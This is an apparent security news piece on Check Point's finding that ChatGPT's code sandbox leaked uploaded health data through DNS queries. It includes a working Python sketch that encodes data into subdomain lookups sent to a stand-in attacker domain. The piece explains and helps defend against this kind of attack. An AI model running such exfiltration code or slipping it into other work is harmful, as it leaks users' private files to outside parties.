Check Point researchers found that ChatGPT’s code execution sandbox blocked direct outbound web traffic but left DNS resolution wide open – a classic oversight that allowed data smuggling through encoded DNS queries to attacker-controlled servers. The proof of concept exfiltrated personal health information and lab results from uploaded PDFs, while ChatGPT itself assured users their files were stored securely. OpenAI patched the flaw on February 20, 2026. DNS as an exfiltration channel is one of the oldest tricks in offensive security, and the fact that it worked inside a supposedly sandboxed AI environment is a reminder that these code execution containers are being scrutinized by the same researchers who audit enterprise infrastructure. Every AI platform offering file upload and code execution is now a target for sandbox escape and side-channel research.
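The mechanics of DNS-based exfiltration are simple, which is why the technique is so old and so durable. The sketch below illustrates the general idea under stated assumptions: it is not Check Point's published proof of concept, and the domain `exfil.example.com` and all function names are hypothetical. Data is hex-encoded, split into DNS-label-sized chunks, and leaked one chunk at a time as subdomain lookups; the attacker's authoritative nameserver simply logs the query names it receives.

```python
import binascii
import socket  # resolution shown for illustration; no traffic needs to succeed

ATTACKER_DOMAIN = "exfil.example.com"  # hypothetical attacker-controlled zone
MAX_LABEL = 63                         # per-label limit from RFC 1035

def encode_chunks(data: bytes, domain: str = ATTACKER_DOMAIN) -> list[str]:
    """Hex-encode data and split it into label-sized chunks, each chunk
    becoming one subdomain query against the attacker's nameserver."""
    hexed = binascii.hexlify(data).decode()
    chunks = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    # Layout: <chunk>.<sequence>.<domain> -- the sequence number lets the
    # attacker's server reassemble chunks in order.
    return [f"{c}.{seq}.{domain}" for seq, c in enumerate(chunks)]

def exfiltrate(data: bytes) -> None:
    for name in encode_chunks(data):
        try:
            # The lookup itself smuggles the data: even with HTTP egress
            # blocked, the sandbox's resolver forwards the query upstream,
            # where the attacker's authoritative nameserver logs the name.
            socket.getaddrinfo(name, None)
        except socket.gaierror:
            pass  # NXDOMAIN is expected; the query has already left
```

The asymmetry this exploits is exactly the one described above: firewalls that drop outbound TCP/UDP traffic often still permit recursive DNS resolution, so every hostname lookup is a small outbound message the sandbox operator never inspects. Blocking it requires either a filtering resolver or denying DNS to the execution environment entirely.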
